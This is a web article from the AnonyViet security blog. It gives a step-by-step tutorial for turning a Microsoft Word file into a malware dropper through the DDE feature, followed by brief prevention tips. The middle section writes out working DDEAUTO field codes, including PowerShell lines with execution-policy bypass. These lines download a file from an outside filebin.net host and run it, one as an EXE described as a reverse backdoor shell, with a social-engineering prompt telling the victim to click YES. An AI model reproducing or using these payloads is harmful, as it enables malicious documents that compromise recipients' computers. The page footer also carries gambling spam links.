• Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
AnonyViet - English Version
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
No Result
View All Result
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
No Result
View All Result
AnonyViet - English Version
No Result
View All Result

Method of attaching Virus with Word file to Hack computer

AnonyViet by AnonyViet
January 26, 2023
in Security
0

Microsoft Word is a word processing software that is installed on almost any computer. So how hackers can “hack” your computer with just word files? In Word there is a function called DDE, and Hackers can take advantage of this feature to spread Viruses.

Join the channel Telegram of the AnonyViet 👉 Link 👈

So what is DDE?

DDE stands for Dynamic Data Exchange and it is an Office feature that allows Office applications to load data from other Office applications. For example, a Word file can update a table by pulling data from an Excel file each time the Word file is opened. This feature makes Word possible to share and exchange data with other applications.

DDE has the ability to allow a Word file when opened to execute code stored in another file and allows applications to send new data updates.

As soon as you finish reading this sentence, you should open your computer/laptop and check if your Microsoft Office has this DDE function enabled or not.

Click the Windows button -> type “Registry Editor” -> Access each item as follows: \HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Security\ -> Look at the column Name if you see the name “AllowDDE” then immediately delete it (Unless you understand this function, please delete it!)

check dde in word

So dangerous, why didn’t Microsoft fix it?

On August 23, 2017, the first report was submitted to Microsoft.

As of September 26, 2017, Microsoft has responded that this is a FEATURE and Microsoft has issued recommendations so that Office users can protect themselves from attacks. The simplest way to stay safe is to beware of any strange messages that pop up every time you open text files.

By December 2017, Microsoft officially updated the changes for Microsoft Word, still keeping the DDE function, but by default when users open a word file with DDE, the link (or command) will not be activated automatically.

Techniques for attaching Viruses to Word files

This is not exactly a virus insertion, but will trigger the virus download command and activate when you open the Word file.

Now I will proceed to detail how the hacker has hijacked your computer with a Word file.

Basically, first open the Word file, go to Insert -> Quick Parts -> Field…

field

A table will appear, double click on ” = (Formula) ”

Method of attaching Virus with Word file to Hack computer 3

A text will appear, right-click, select “Toggle Field Codes”

Toggle Field Codes

Change the content in brackets to the following code:

DDEAUTO "C:\\Windows\\System32\\cmd.exe" "/k calc.exe"

The purpose of the above command: access and Command Prompt (cmd) on Windows and open the calculator application (calc.exe )

Save and when you open this file, Word will ask if you want to enable calc.exe?

start word virus

When YES is pressed, the calculator application will be opened

word virus is created by anonyviet.com

The question here is that you can see that Word files can access the windows cmd, so instead of opening the desktop application, we can execute many other permissions such as, open powerShell, create backdoors, download files virus to the computer and take control of the computer.

Command example:

word office virus code

{ DDEAUTO "C:\\windows\\system32\\cmd.exe /k powershell -NoP -NonI -Exec Bypass IEX (New-Object System.Net.WebClient).DownloadFile('https://filebin.net/hrarledvb6twlgek/test.txt?t=9gxtd1yk%27%2C%27test1.txt');start 'test1.txt' # " "for security reasons click YES" }

Purpose: Download the txt file from the above website and open the downloaded file.

Method of attaching Virus with Word file to Hack computer 4

{ DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\cmd.exe /k powershell -NoP -NonI -Exec Bypass IEX (New-Object System.Net.WebClient).DownloadFile('https://filebin.net/hrarledvb6twlgek/test.txt?t=9gxtd1yk%27%2C%27test1.txt');start 'RCE.exe' # " "for security reasons click YES" }

Change from txt file to EXE file and execute (depending on what purpose this EXE file was created for eg Malware, Virus, Trojan, …) In the video I demo, the purpose of the EXE file is reverse backdoor shell windows.

Prevention

With such a level of danger, what should we do?

  • The first thing to mention is to do the same note I just mentioned.
  • Scan for viruses with the downloaded file

Website example https://www.virustotal.com/gui/

  • Beware of files from unreliable sources
  • If in doubt, go to the shop to test first.

Hope this article can protect everyone from dangerous tricks of hackers

Thank you for taking the time to read this post ^^! have a nice day.

Article by author Nguyen Quoc Khanh shared in Group Cybersecurity Awareness with Hieupc and friends – 7Onez.com

The article achieved: 5/5 – (100 votes)

Tags: attachingcomputerfileHackMethodvirusword
Previous Post

Lesson 7: AutoFit – Align Excel cells to fit the content – Basic Excel

Next Post

8 tips to help you increase productivity on Chrome

AnonyViet

AnonyViet

Related Posts

How to use hackers use Splitfus to execute PowerShell malicious code
Security

How to use hackers use Splitfus to execute PowerShell malicious code

July 20, 2025
How to implement Shellcode Injection attack technique with Autoit
Security

How to implement Shellcode Injection attack technique with Autoit

March 14, 2025
How to exploit the holy hole of Hijacking on Windows
Security

How to exploit the holy hole of Hijacking on Windows

March 8, 2025
Hamamal: Shellcode execution technique from afar to overcome Antivirus's discovery
Security

Hamamal: Shellcode execution technique from afar to overcome Antivirus's discovery

February 10, 2025
Snov.io Email Finder: Search emails with only company name/domain name/LinkedIn profile
Security

Snov.io Email Finder: Search emails with only company name/domain name/LinkedIn profile

December 14, 2024
Capsolver: Automatic solution solution for business
Security

Capsolver: Automatic solution solution for business

December 12, 2024
Next Post
8 tips to help you increase productivity on Chrome

8 tips to help you increase productivity on Chrome

0 0 votes
Article Rating
Subscribe
Login
Notify of
guest

guest

0 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments

Recent News

Online driving exam preparation: Support theory and practice

Online driving exam preparation: Support theory and practice

August 15, 2025
How to add application to your favorite bar

How to add application to your favorite bar

August 14, 2025
Wowhay.com – The door opens the world of modern knowledge and network culture

Wowhay.com – The door opens the world of modern knowledge and network culture

August 13, 2025
Instructions on how to fix Screen Time Limited Reached on RoBlox

Instructions on how to fix Screen Time Limited Reached on RoBlox

August 13, 2025
Online driving exam preparation: Support theory and practice

Online driving exam preparation: Support theory and practice

August 15, 2025
How to add application to your favorite bar

How to add application to your favorite bar

August 14, 2025
Wowhay.com – The door opens the world of modern knowledge and network culture

Wowhay.com – The door opens the world of modern knowledge and network culture

August 13, 2025
AnonyViet - English Version

AnonyViet

AnonyViet is a website share knowledge that you have never learned in school!

We are ready to welcome your comments, as well as your articles sent to AnonyViet.

Follow Us

Contact:

Email: anonyviet.com[@]gmail.com

Main Website: https://anonyviet.com

Recent News

Online driving exam preparation: Support theory and practice

Online driving exam preparation: Support theory and practice

August 15, 2025
How to add application to your favorite bar

How to add application to your favorite bar

August 14, 2025
  • Home
  • Home 2
  • Home 3
  • Home 4
  • Home 5
  • Home 6
  • Next Dest Page
  • Sample Page

©2024 AnonyVietFor Knowledge kqxs hôm nay xem phim miễn phí mm88 8XBET mm88 trang chủ new88

No Result
View All Result
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office

©2024 AnonyVietFor Knowledge kqxs hôm nay xem phim miễn phí mm88 8XBET mm88 trang chủ new88

wpDiscuz
0
0
Would love your thoughts, please comment.x
()
x
| Reply